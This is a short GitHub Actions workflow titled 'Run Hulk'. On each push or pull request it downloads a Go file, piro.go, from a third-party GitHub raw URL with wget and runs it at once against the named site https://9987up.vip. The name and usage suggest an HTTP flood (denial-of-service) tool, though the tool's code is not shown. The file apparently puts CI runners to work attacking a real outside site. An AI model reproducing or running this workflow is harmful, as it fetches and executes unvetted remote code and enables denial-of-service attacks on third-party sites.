name: Run Hulk

on: [push, pull_request]

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - name: Set up Go
      uses: actions/setup-go@v2
      with:
        go-version: 1.17

    - name: Download Hulk
      run: |
        wget https://raw.githubusercontent.com/hk4crprasad/hk4crprasad/master/piro.go
        go mod init piro
        go run piro.go --site https://9987up.vip
